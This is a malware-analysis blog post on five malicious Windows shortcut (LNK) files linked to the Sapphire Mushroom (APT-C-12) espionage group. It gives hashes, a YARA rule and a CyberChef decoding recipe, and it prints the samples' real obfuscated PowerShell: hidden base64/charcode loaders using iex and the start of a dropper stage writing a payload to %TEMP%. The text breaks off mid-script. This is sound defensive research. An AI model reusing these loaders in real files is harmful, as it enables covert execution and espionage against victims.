<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <title>
        Suspected Sapphire Mushroom (APT-C-12) malicious LNK files - bit_of_hex
      </title>
    <head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport"
    content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  
  <meta name="theme-color" content="#000000" />
  
  <meta http-equiv="window-target" content="_top" />
  
  
  <meta name="description" content="In July 2018, the Chinese-based research group 360 Technical Intelligence Center (TIC) produced a report &amp;ldquo;蓝宝菇（APT-C-12）针对性攻击技术细节揭秘&amp;rdquo; (Sapphire Mushroom (APT-C-12) Technical Details Revealed1). This report analysed a malicious LNK file allegedly used by the" />
  <meta name="generator" content="Hugo 0.68.3 with theme pure" />
  <title>Suspected Sapphire Mushroom (APT-C-12) malicious LNK files - bit_of_hex</title>
  
  
  <link rel="stylesheet" href="https://bitofhex.com/css/style.min.c4bc7071f132c964c2116bca53b392933f377e5ca7b7051ed245187c621a2d3e.css">
  
  <link rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/9.15.10/styles/github.min.css" async>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.css" async>
  <meta property="og:title" content="Suspected Sapphire Mushroom (APT-C-12) malicious LNK files" />
<meta property="og:description" content="In July 2018, the Chinese-based research group 360 Technical Intelligence Center (TIC) produced a report &ldquo;蓝宝菇（APT-C-12）针对性攻击技术细节揭秘&rdquo; (Sapphire Mushroom (APT-C-12) Technical Details Revealed1). This report analysed a malicious LNK file allegedly used by the" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://bitofhex.com/2020/02/sapphire-mushroom-lnk-files/" />
<meta property="article:published_time" content="2020-02-09T23:54:19+00:00" />
<meta property="article:modified_time" content="2020-02-09T23:54:19+00:00" />
<meta itemprop="name" content="Suspected Sapphire Mushroom (APT-C-12) malicious LNK files">
<meta itemprop="description" content="In July 2018, the Chinese-based research group 360 Technical Intelligence Center (TIC) produced a report &ldquo;蓝宝菇（APT-C-12）针对性攻击技术细节揭秘&rdquo; (Sapphire Mushroom (APT-C-12) Technical Details Revealed1). This report analysed a malicious LNK file allegedly used by the">
<meta itemprop="datePublished" content="2020-02-09T23:54:19&#43;00:00" />
<meta itemprop="dateModified" content="2020-02-09T23:54:19&#43;00:00" />
<meta itemprop="wordCount" content="4146">



<meta itemprop="keywords" content="lnk files,cyberchef,malware,threat intelligence,apt," /><meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Suspected Sapphire Mushroom (APT-C-12) malicious LNK files"/>
<meta name="twitter:description" content="In July 2018, the Chinese-based research group 360 Technical Intelligence Center (TIC) produced a report &ldquo;蓝宝菇（APT-C-12）针对性攻击技术细节揭秘&rdquo; (Sapphire Mushroom (APT-C-12) Technical Details Revealed1). This report analysed a malicious LNK file allegedly used by the"/>

  <!--[if lte IE 9]>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
    <![endif]-->

  <!--[if lt IE 9]>
      <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
      <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
    <![endif]-->

</head>
  </head>

  
  

  <body class="main-center theme-black" itemscope itemtype="http://schema.org/WebPage"><header class="header" itemscope itemtype="http://schema.org/WPHeader">
    <div class="slimContent">
      <div class="navbar-header">
        <div class="profile-block text-center">
          <a id="avatar" href="https://twitter.com/mattnotmax" target="_blank">
            <img class="img-circle img-rotate" src="https://bitofhex.com/logo.png" width="200" height="200">
          </a>
          <h2 id="name" class="hidden-xs hidden-sm">bit_of_hex</h2>
          <h3 id="title" class="hidden-xs hidden-sm hidden-md">digital forensics | incident response</h3>
          <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i>Melbourne, Australia</small>
        </div><div class="search" id="search-form-wrap">
    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="Search" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i
                        class="icon icon-search"></i></button>
            </span>
        </div>
        <div class="ins-search">
            <div class="ins-search-mask"></div>
            <div class="ins-search-container">
                <div class="ins-input-wrapper">
                    <input type="text" class="ins-search-input" placeholder="Type something..."
                        x-webkit-speech />
                    <button type="button" class="close ins-close ins-selectable" data-dismiss="modal"
                        aria-label="Close"><span aria-hidden="true">×</span></button>
                </div>
                <div class="ins-section-wrapper">
                    <div class="ins-section-container"></div>
                </div>
            </div>
        </div>
    </form>
</div>
        <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
          <span class="sr-only">Toggle navigation</span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
        </button>
      </div>
      <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
        <ul class="nav navbar-nav main-nav">
            <li class="menu-item menu-item-home">
                <a href="/">
                    <i class="icon icon-home-fill"></i>
                  <span class="menu-title">Home</span>
                </a>
            </li>
            <li class="menu-item menu-item-archives">
                <a href="/posts/">
                    <i class="icon icon-archives-fill"></i>
                  <span class="menu-title">Archives</span>
                </a>
            </li>
            <li class="menu-item menu-item-tags">
                <a href="/tags/">
                    <i class="icon icon-tags"></i>
                  <span class="menu-title">Tags</span>
                </a>
            </li>
            <li class="menu-item menu-item-about">
                <a href="/about/">
                    <i class="icon icon-cup-fill"></i>
                  <span class="menu-title">About</span>
                </a>
            </li>
        </ul>
      </nav>
    </div>
  </header>

<aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      
<div class="widget">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget-body">
        <ul class="recent-post-list list-unstyled no-thumbnail">
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://bitofhex.com/2020/02/sapphire-mushroom-lnk-files/" class="title">Suspected Sapphire Mushroom (APT-C-12) malicious LNK files</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2020-02-09 23:54:19 &#43;0000 UTC" itemprop="datePublished">2020-02-09</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://bitofhex.com/2019/11/say-cheese-an-analysis-of-foto-lnk/" class="title">&#34;Say Cheese!&#34; An analysis of foto.lnk</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2019-11-16 16:46:26 &#43;0000 UTC" itemprop="datePublished">2019-11-16</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://bitofhex.com/2019/07/deriving-intelligence-from-lnk-files/" class="title">Deriving intelligence from LNK files</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2019-07-15 02:14:48 &#43;0000 UTC" itemprop="datePublished">2019-07-15</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://bitofhex.com/2019/02/base64-encoded-signatures/" class="title">Base64 Encoded File Signatures</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2019-02-19 00:06:06 &#43;0000 UTC" itemprop="datePublished">2019-02-19</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://bitofhex.com/2019/01/attack-and-singapore-breach/" class="title">ATT&amp;CKing the Singapore Health Data Breach</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2019-01-12 17:53:26 &#43;0000 UTC" itemprop="datePublished">2019-01-12</time>
                    </p>
                </div>
            </li>
        </ul>
    </div>
</div>
  </div>
</aside>

    
    
<aside class="sidebar sidebar-toc collapse" id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    <h4 class="toc-title">Catalogue</h4>
    <nav id="toc" class="js-toc toc">

    </nav>
  </div>
</aside>
<main class="main" role="main"><div class="content">
  <article id="-sapphire-mushroom-lnk-files" class="article article-type-" itemscope
    itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      <h1 itemprop="name">
  <a
    class="article-title"
    href="/2020/02/sapphire-mushroom-lnk-files/"
    >Suspected Sapphire Mushroom (APT-C-12) malicious LNK files</a
  >
</h1>

      <div class="article-meta">
        
<span class="article-date">
  <i class="icon icon-calendar-check"></i>&nbsp;
<a href="https://bitofhex.com/2020/02/sapphire-mushroom-lnk-files/" class="article-date">
  <time datetime="2020-02-09 23:54:19 &#43;0000 UTC" itemprop="datePublished">2020-02-09</time>
</a>
</span>
  
  <span class="article-tag">
    <i class="icon icon-tags"></i>&nbsp;
    <a class="article-tag-link" href="/tags/lnk-files/"> lnk files </a>
    <a class="article-tag-link" href="/tags/cyberchef/"> cyberchef </a>
    <a class="article-tag-link" href="/tags/malware/"> malware </a>
    <a class="article-tag-link" href="/tags/threat-intelligence/"> threat intelligence </a>
    <a class="article-tag-link" href="/tags/apt/"> apt </a>
  </span>

        <span class="post-comment"><i class="icon icon-comment"></i>&nbsp;<a href="/2020/02/sapphire-mushroom-lnk-files/#comments"
            class="article-comment-link">Comments</a></span>
      </div>
    </div>
    <div class="article-entry marked-body js-toc-content" itemprop="articleBody">
      <p>In July 2018, the Chinese-based research group 360 Technical Intelligence Center (TIC) produced a report &ldquo;蓝宝菇（APT-C-12）针对性攻击技术细节揭秘&rdquo; (Sapphire Mushroom (APT-C-12) Technical Details Revealed<sup id="fnref:1"><a href="#fn:1" class="footnote-ref" role="doc-noteref">1</a></sup>). This report analysed a malicious LNK file allegedly used by the APT group &ldquo;Sapphire Mushroom&rdquo; (蓝宝菇 aka Blue Mushroom aka NuclearCrisis). The group, <a href="https://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&amp;mid=2247490118&amp;idx=3&amp;sn=ae1b036a1c1263142bb350cb21057bc4">according to 360 TIC</a>:</p>
<blockquote>
<p>&hellip;has carried out continuous cyber espionage activities on key units and departments of the Chinese government, military industry, scientific research, and finance. The organization focuses on information related to the nuclear industry and scientific research. The targets were mainly concentrated in mainland China&hellip;[M]ore than 670 malware samples have been collected from the group, including more than 60 malicious plugins specifically for lateral movement; more than 40 C2 domain names and IPs related to the organization have also been discovered.</p>
</blockquote>
<p>The group appeared in March 2011 and appears to be targeting a wide variety of Chinese government and industries with spear-phishing emails. An early tactic used <a href="https://attack.mitre.org/techniques/T1036/">right-to-left override (RTLO or RLO) character</a> to give the appearance of a regular file, and also malicious LNK files.</p>
<p>There is limited background I can find publicly on this group. They are not listed by that name or any variant on the <a href="https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/edit?usp=sharing">APT Groups and Operations Spreadsheet</a>. I also don&rsquo;t have access to much private threat intelligence to trawl against. 360 TIC does not make a country attribution (that I can find) in its reports.</p>
<p>What is <a href="https://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&amp;mid=2247490118&amp;idx=3&amp;sn=ae1b036a1c1263142bb350cb21057bc4">publicly written</a> is singled-sourced from 360 TIC and helpfully <a href="https://pastebin.com/e7HKBrzN">translated</a> by <a href="https://twitter.com/Viking_Sec">@Viking_Sec</a></p>
<h3 id="its-the-l-to-the-n-to-the-k">It&rsquo;s the &lsquo;L&rsquo; to the &lsquo;N&rsquo; to the &lsquo;K&rsquo;</h3>
<p>Flash-forward to January 2020 and I was trawling through Hybrid-Analysis searching for interesting LNK files, I came across these five samples:</p>
<div style="width: 85%; height: 85%; display: block; margin: 0 auto;" ><img src="/2020/01/HA-summary.png" alt="HA-summary" style="border: #000000 1px outset"></div>
<p>Analysis indicates one of these samples is very similar to the same analysed in the 360 TIC report (of which the hash was not released) and the other four were previously unreported. Further, looking at the samples it is <em>possible</em> targets can be identified based on the malware - although this is not confirmed at this time.</p>
<p>So, with a combination of thread-pulling and reviewing the original 360 TIC report we can look at how these samples are related and any further information that might be interesting.</p>
<h3 id="the-famous-five-lnks">The Famous Five (LNKs)</h3>
<p>What immediately stood out to me was the enormous size of these LNK files: between 400KB to 1.3 MB. Which is massive for such a (normally) little file. This generally indicates data is appended to the end of the file. If it&rsquo;s larger than normal then it&rsquo;s often a PE executable that is simply extracted out. How wrong I was.</p>
<p>What was also interesting is all of these samples were Chinese-language named and uploaded to Hybrid-Analysis at about the same time. The summary is as follows:</p>
<style type="text/css">
.tg  {border-collapse:collapse;border-spacing:0;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;}
.tg .tg-1wig{font-weight:bold;text-align:left;vertical-align:top}
.tg .tg-0lax{text-align:left;vertical-align:top}
</style>
<table class="tg">
  <tr>
    <th class="tg-1wig">Date of Upload</th>
    <th class="tg-1wig">File Name</th>
    <th class="tg-1wig">Google Translation</th>
    <th class="tg-1wig">SHA256 Hash</th>
  </tr>
  <tr>
    <td class="tg-0lax">October 29th 2019 11:00:46 (UTC)</td>
    <td class="tg-0lax">陈婧简历+作品.lnk</td>
    <td class="tg-0lax">Chen Jing's resume + works</td>
    <td class="tg-0lax">20ad6fa72982a6ba0f9499361b2aa3a3f5cca73fd397c2969d08a4c5f2866814</td>
  </tr>
  <tr>
    <td class="tg-0lax">October 29th 2019 11:03:47 (UTC)</td>
    <td class="tg-0lax">周文重：2018博鳌亚洲论坛感谢函.lnk</td>
    <td class="tg-0lax">Zhou Wenzhong: Thank you letter for Boao Forum for Asia 2018</td>
    <td class="tg-0lax">b0d7118d75c0f2a99fa5b319148b89148800e5db06ee403d6a31c451a8a54f2b</td>
  </tr>
  <tr>
    <td class="tg-0lax">October 29th 2019 12:40:00 (UTC)</td>
    <td class="tg-0lax">【2018前海合作论坛】.lnk</td>
    <td class="tg-0lax">Qianhai Cooperation Forum 2018</td>
    <td class="tg-0lax">70b6961af57bce72b89103197c8897a4ae3ce5fdb835ccd050f24acbac52900d</td>
  </tr>
  <tr>
    <td class="tg-0lax">October 29th 2019 12:40:33 (UTC)</td>
    <td class="tg-0lax">《政法网络舆情》会员申请.lnk </td>
    <td class="tg-0lax">"Politics and Law Network Public Opinion" Member Application</td>
    <td class="tg-0lax">ea6e7c9b9110c7c21062908be51dd3f881490b40b9b77a534fdc7812ab5cd2af</td>
  </tr>
  <tr>
    <td class="tg-0lax">October 29th 2019 12:40:54 (UTC)</td>
    <td class="tg-0lax">《观察者网》采访提纲暨相关新闻附件.lnk</td>
    <td class="tg-0lax">"Observer Network" Interview Outline and Related News Attachments</td>
    <td class="tg-0lax">6ccad83fb9f7a50ac95e3e865a27be0288279e76fcd3b5af495c6fcf6d58fa36</td>
  </tr>
</table>
<p>The second-last sample (SHA256 ea6e7c9b9110c7c21062908be51dd3f881490b40b9b77a534fdc7812ab5cd2af) is very similar to that analysed in the 360 TIC report. This is based on basic characteristics including: filename, file size, reported strings, reported C2 and exfiltration domains, and secondary dropped malware.</p>
<h3 id="a-quick-comparison">A Quick Comparison</h3>
<p>Running the five samples through Eric Zimmerman&rsquo;s LECMD and comparing their overall hex content indicated they were likely related. Points of interest included:</p>
<ul>
<li>All had much of their metadata wiped including internal dates and times, MAC addresses, and Volume Serial Numbers. This itself is an anomaly that is <a href="https://windowsir.blogspot.com/2018/07/lnk-toolmarks.html">a useful tool mark</a> to match samples.</li>
<li>What <em>wasn&rsquo;t</em> wiped was the Security Identifier (SID) for each of the LNK files which indicated the user account from which the LNK file was created:</li>
</ul>
<style type="text/css">
.tg  {border-collapse:collapse;border-spacing:0;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;}
.tg .tg-cly1{text-align:left;vertical-align:middle}
.tg .tg-yla0{font-weight:bold;text-align:left;vertical-align:middle}
.tg .tg-0lax{text-align:left;vertical-align:top}
</style>
<table class="tg">
  <tr>
    <th class="tg-yla0">SHA256 Hash</th>
    <th class="tg-yla0">SID</th>
  </tr>
  <tr>
    <td class="tg-cly1">20ad6fa72982a6ba0f9499361b2aa3a3f5cca73fd397c2969d08a4c5f2866814</td>
    <td class="tg-cly1">S-1-5-21-768223713-132671932-3453716105-7998</td>
  </tr>
  <tr>
    <td class="tg-cly1">b0d7118d75c0f2a99fa5b319148b89148800e5db06ee403d6a31c451a8a54f2b</td>
    <td class="tg-cly1">S-1-5-21-768223713-132671932-3453716105-8001</td>
  </tr>
  <tr>
    <td class="tg-0lax">70b6961af57bce72b89103197c8897a4ae3ce5fdb835ccd050f24acbac52900d</td>
    <td class="tg-0lax">S-1-5-21-768223713-132671932-3453716105-7998</td>
  </tr>
  <tr>
    <td class="tg-0lax">ea6e7c9b9110c7c21062908be51dd3f881490b40b9b77a534fdc7812ab5cd2af</td>
    <td class="tg-0lax">S-1-5-21-768223713-132671932-3453716105-7998</td>
  </tr>
  <tr>
    <td class="tg-0lax">6ccad83fb9f7a50ac95e3e865a27be0288279e76fcd3b5af495c6fcf6d58fa36</td>
    <td class="tg-0lax">S-1-5-21-768223713-132671932-3453716105-7998</td>
  </tr>
</table>
<p>So, all the samples were created on the same Windows environment and all but one was created with the same user account. Maybe they let the intern have a go?</p>
<p>This would be a good Yara rule to start a hunt:</p>
<pre><code class="xml">rule LNK_Based_on_SID
{
	meta:
		sample = "70b6961af57bce72b89103197c8897a4ae3ce5fdb835ccd050f24acbac52900d"
		author = "@mattnotmax"
		date = "2020-01-23"
		
	strings:
		$SID = "S-1-5-21-768223713-132671932-3453716105" wide
		
	condition:
		filesize > 400KB and 
		uint16(0) == 0x4c and 
		$SID
}
</code></pre>
<p>Only one sample (70b6961af57bce72b89103197c8897a4ae3ce5fdb835ccd050f24acbac52900d) had been uploaded to Virus Total about the same time as the Hybrid-Analysis uploads: 29 October 2019 at 12:43:22 UTC. At the time of writing it registered 16/58 detections, but all were non-specific Trojan detections.</p>
<div style="width: 50%; height: 50%; display: block; margin: 0 auto;" ><img src="/2020/01/vt.png" alt="vt" style="border: #000000 1px outset"></div>
<h3 id="malicious-script-delivery">Malicious Script Delivery</h3>
<p>All the LNK files also have similar PowerShell delivery: a plethora of white space to hide a PowerShell encoded commanded from the user, followed by a Base64 encoded script.</p>
<div style="width: 30%; height: 30%; display: block; margin: 0 auto;" ><img src="/2020/01/shortcut_1.png" alt="shortcut_1" style="border: #000000 1px outset"></div>
<p>The five payloads are:</p>
<pre><code class="powershell">-w hidden $r='LWpvaW4oKDM2LDU3LDYxLDM2LDEwNCwxMTEsMTE1LDExNiw0NiwxMTcsMTA1LDQ2LDExNCw5NywxMTksMTE3LDEwNSw0NiwxMTksMTA1LDExMCwxMDAsMTExLDExOSwxMTYsMTA1LDExNiwxMDgsMTAxLDU5LDczLDEwMiw0MCwzMywzNiw1Nyw0NiwxMDEsMTEwLDEwMCwxMTUsMTE5LDEwNSwxMTYsMTA0LDQwLDM5LDQ2LDEwOCwxMTAsMTA3LDM5LDQxLDQxLDEyMywzNiw1Nyw0Myw2MSwzOSw0NiwxMDgsMTEwLDEwNywzOSwxMjUsMzYsNTcsNjEsMTAzLDEwNSwzMiwzNiw1Nyw1OSwxMDgsMTA5LDU2LDMyLDQwLDEwMyw5OSwzMiwzNiw1NywxMjQsMTE1LDEwMSwxMDgsMTAxLDk5LDExNiwzMiw0NSwxMDgsMzIsNDksNDEpfCV7W2ludF0kXy1BU1tjaGFyXX0pfGlleA==';Function lm8{param($v);iex ([text.encoding]::utf8.getstring([convert]::frombase64string($v)))}lm8 $r
-w hidden $6='LWpvaW4oKDM2LDQ5LDYxLDM2LDEwNCwxMTEsMTE1LDExNiw0NiwxMTcsMTA1LDQ2LDExNCw5NywxMTksMTE3LDEwNSw0NiwxMTksMTA1LDExMCwxMDAsMTExLDExOSwxMTYsMTA1LDExNiwxMDgsMTAxLDU5LDczLDEwMiw0MCwzMywzNiw0OSw0NiwxMDEsMTEwLDEwMCwxMTUsMTE5LDEwNSwxMTYsMTA0LDQwLDM5LDQ2LDEwOCwxMTAsMTA3LDM5LDQxLDQxLDEyMywzNiw0OSw0Myw2MSwzOSw0NiwxMDgsMTEwLDEwNywzOSwxMjUsMzYsNDksNjEsMTAzLDEwNSwzMiwzNiw0OSw1OSwxMTksMTE0LDQ5LDMyLDQwLDEwMyw5OSwzMiwzNiw0OSwxMjQsMTE1LDEwMSwxMDgsMTAxLDk5LDExNiwzMiw0NSwxMDgsMzIsNDksNDEpfCV7W2ludF0kXy1BU1tjaGFyXX0pfGlleA==';Function wr1{param($3);iex ([text.encoding]::utf8.getstring([convert]::frombase64string($3)))}wr1 $6
-w hidden $3='LWpvaW4oKDM2LDUwLDYxLDM2LDEwNCwxMTEsMTE1LDExNiw0NiwxMTcsMTA1LDQ2LDExNCw5NywxMTksMTE3LDEwNSw0NiwxMTksMTA1LDExMCwxMDAsMTExLDExOSwxMTYsMTA1LDExNiwxMDgsMTAxLDU5LDczLDEwMiw0MCwzMywzNiw1MCw0NiwxMDEsMTEwLDEwMCwxMTUsMTE5LDEwNSwxMTYsMTA0LDQwLDM5LDQ2LDEwOCwxMTAsMTA3LDM5LDQxLDQxLDEyMywzNiw1MCw0Myw2MSwzOSw0NiwxMDgsMTEwLDEwNywzOSwxMjUsMzYsNTAsNjEsMTAzLDEwNSwzMiwzNiw1MCw1OSwxMTAsNDgsNDgsMzIsNDAsMTAzLDk5LDMyLDM2LDUwLDEyNCwxMTUsMTAxLDEwOCwxMDEsOTksMTE2LDMyLDQ1LDEwOCwzMiw0OSw0MSl8JXtbaW50XSRfLUFTW2NoYXJdfSl8aWV4';Function n00{param($z);iex ([text.encoding]::utf8.getstring([convert]::frombase64string($z)))}n00 $3
-w hidden $5='LWpvaW4oKDM2LDEwMSw2MSwzNiwxMDQsMTExLDExNSwxMTYsNDYsMTE3LDEwNSw0NiwxMTQsOTcsMTE5LDExNywxMDUsNDYsMTE5LDEwNSwxMTAsMTAwLDExMSwxMTksMTE2LDEwNSwxMTYsMTA4LDEwMSw1OSw3MywxMDIsNDAsMzMsMzYsMTAxLDQ2LDEwMSwxMTAsMTAwLDExNSwxMTksMTA1LDExNiwxMDQsNDAsMzksNDYsMTA4LDExMCwxMDcsMzksNDEsNDEsMTIzLDM2LDEwMSw0Myw2MSwzOSw0NiwxMDgsMTEwLDEwNywzOSwxMjUsMzYsMTAxLDYxLDEwMywxMDUsMzIsMzYsMTAxLDU5LDExNSwxMDYsNTUsMzIsNDAsMTAzLDk5LDMyLDM2LDEwMSwxMjQsMTE1LDEwMSwxMDgsMTAxLDk5LDExNiwzMiw0NSwxMDgsMzIsNDksNDEpfCV7W2ludF0kXy1BU1tjaGFyXX0pfGlleA==';Function sj7{param($z);iex ([text.encoding]::utf8.getstring([convert]::frombase64string($z)))}sj7 $5
-w hidden $o='LWpvaW4oKDM2LDk3LDYxLDM2LDEwNCwxMTEsMTE1LDExNiw0NiwxMTcsMTA1LDQ2LDExNCw5NywxMTksMTE3LDEwNSw0NiwxMTksMTA1LDExMCwxMDAsMTExLDExOSwxMTYsMTA1LDExNiwxMDgsMTAxLDU5LDczLDEwMiw0MCwzMywzNiw5Nyw0NiwxMDEsMTEwLDEwMCwxMTUsMTE5LDEwNSwxMTYsMTA0LDQwLDM5LDQ2LDEwOCwxMTAsMTA3LDM5LDQxLDQxLDEyMywzNiw5Nyw0Myw2MSwzOSw0NiwxMDgsMTEwLDEwNywzOSwxMjUsMzYsOTcsNjEsMTAzLDEwNSwzMiwzNiw5Nyw1OSwxMTMsNTQsNTIsMzIsNDAsMTAzLDk5LDMyLDM2LDk3LDEyNCwxMTUsMTAxLDEwOCwxMDEsOTksMTE2LDMyLDQ1LDEwOCwzMiw0OSw0MSl8JXtbaW50XSRfLUFTW2NoYXJdfSl8aWV4';Function q64{param($6);iex ([text.encoding]::utf8.getstring([convert]::frombase64string($6)))}q64 $o
</code></pre>
<p>When converted from Base64 there is another layer of CharCode (Unicode character numbers):</p>
<pre><code class="ps">-join((36,57,61,36,104,111,115,116,46,117,105,46,114,97,119,117,105,46,119,105,110,100,111,119,116,105,116,108,101,59,73,102,40,33,36,57,46,101,110,100,115,119,105,116,104,40,39,46,108,110,107,39,41,41,123,36,57,43,61,39,46,108,110,107,39,125,36,57,61,103,105,32,36,57,59,108,109,56,32,40,103,99,32,36,57,124,115,101,108,101,99,116,32,45,108,32,49,41)|%{[int]$_-AS[char]})|iex
-join((36,49,61,36,104,111,115,116,46,117,105,46,114,97,119,117,105,46,119,105,110,100,111,119,116,105,116,108,101,59,73,102,40,33,36,49,46,101,110,100,115,119,105,116,104,40,39,46,108,110,107,39,41,41,123,36,49,43,61,39,46,108,110,107,39,125,36,49,61,103,105,32,36,49,59,119,114,49,32,40,103,99,32,36,49,124,115,101,108,101,99,116,32,45,108,32,49,41)|%{[int]$_-AS[char]})|iex
-join((36,50,61,36,104,111,115,116,46,117,105,46,114,97,119,117,105,46,119,105,110,100,111,119,116,105,116,108,101,59,73,102,40,33,36,50,46,101,110,100,115,119,105,116,104,40,39,46,108,110,107,39,41,41,123,36,50,43,61,39,46,108,110,107,39,125,36,50,61,103,105,32,36,50,59,110,48,48,32,40,103,99,32,36,50,124,115,101,108,101,99,116,32,45,108,32,49,41)|%{[int]$_-AS[char]})|iex
-join((36,101,61,36,104,111,115,116,46,117,105,46,114,97,119,117,105,46,119,105,110,100,111,119,116,105,116,108,101,59,73,102,40,33,36,101,46,101,110,100,115,119,105,116,104,40,39,46,108,110,107,39,41,41,123,36,101,43,61,39,46,108,110,107,39,125,36,101,61,103,105,32,36,101,59,115,106,55,32,40,103,99,32,36,101,124,115,101,108,101,99,116,32,45,108,32,49,41)|%{[int]$_-AS[char]})|iex
-join((36,97,61,36,104,111,115,116,46,117,105,46,114,97,119,117,105,46,119,105,110,100,111,119,116,105,116,108,101,59,73,102,40,33,36,97,46,101,110,100,115,119,105,116,104,40,39,46,108,110,107,39,41,41,123,36,97,43,61,39,46,108,110,107,39,125,36,97,61,103,105,32,36,97,59,113,54,52,32,40,103,99,32,36,97,124,115,101,108,101,99,116,32,45,108,32,49,41)|%{[int]$_-AS[char]})|iex
</code></pre>
<p>The above two rounds of obfuscation can be decoded using <a href="https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Regular_expression('User%20defined','%5B0-9%5D%7B2,3%7D',true,true,false,false,false,false,'List%20matches')From_Charcode('Space',16)">CyberChef</a> goodness:</p>
<pre><code class="ps">[{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+=/]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Fork","args":["\\n","\\n\\n\\n",false]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Regular expression","args":["User defined","([0-9]{2,3})",true,true,false,false,false,false,"List matches"]},{"op":"Find / Replace","args":[{"option":"Extended (\\n, \\t, \\x...)","string":"\\n"},", ",true,false,true,false]},{"op":"From Charcode","args":["Comma",10]}]</code></pre>
<p>This reveals:</p>
<pre><code class="powershell">$9=$host.ui.rawui.windowtitle;If(!$9.endswith('.lnk')){$9+='.lnk'}$9=gi $9;lm8 (gc $9|select -l 1)

$1=$host.ui.rawui.windowtitle;If(!$1.endswith('.lnk')){$1+='.lnk'}$1=gi $1;wr1 (gc $1|select -l 1)
$2=$host.ui.rawui.windowtitle;If(!$2.endswith('.lnk')){$2+='.lnk'}$2=gi $2;n00 (gc $2|select -l 1)
$e=$host.ui.rawui.windowtitle;If(!$e.endswith('.lnk')){$e+='.lnk'}$e=gi $e;sj7 (gc $e|select -l 1)
$a=$host.ui.rawui.windowtitle;If(!$a.endswith('.lnk')){$a+='.lnk'}$a=gi $a;q64 (gc $a|select -l 1)
</code></pre>
<p>All of these do the same thing: check the title text in the current window, rename that text to end in <code>.lnk</code> if needed, then select the last line of the LNK file and extract it.</p>
<h3 id="babushka-lnk-dolls">Babushka (LNK) Dolls</h3>
<p>Extracting out the last line of the LNK files reveals more Base64 encoded CharCode. Due to the length, I&rsquo;ll copy one sample here and the <a href="https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Regular_expression('User%20defined','%5B0-9%5D%7B2,3%7D',true,true,false,false,false,false,'List%20matches')From_Charcode('Space',16)">same CyberChef</a> recipe can quickly deal with it:</p>
<p>Here&rsquo;s the extracted and semi-clean PowerShell from sample 70b6961af57bce72b89103197c8897a4ae3ce5fdb835ccd050f24acbac52900d:</p>
<pre><code class="powershell">[io.file]::writeallbytes("$env:tmp\xgihT.Z",[convert]::frombase64string((gc $2|select -l 2|select -f 1)));
expand /f:* "$env:tmp\xgihT.Z" "$env:tmp\";
del -fo "$env:tmp\xgihT.Z";
If (test-path $env:tmp\xgihT) {
    del -fo -r "$env:tmp\xgihT"
    }
rni -fo "$env:tmp\tmp" "xgihT";
md -fo "$env:AppData\WinRAR";
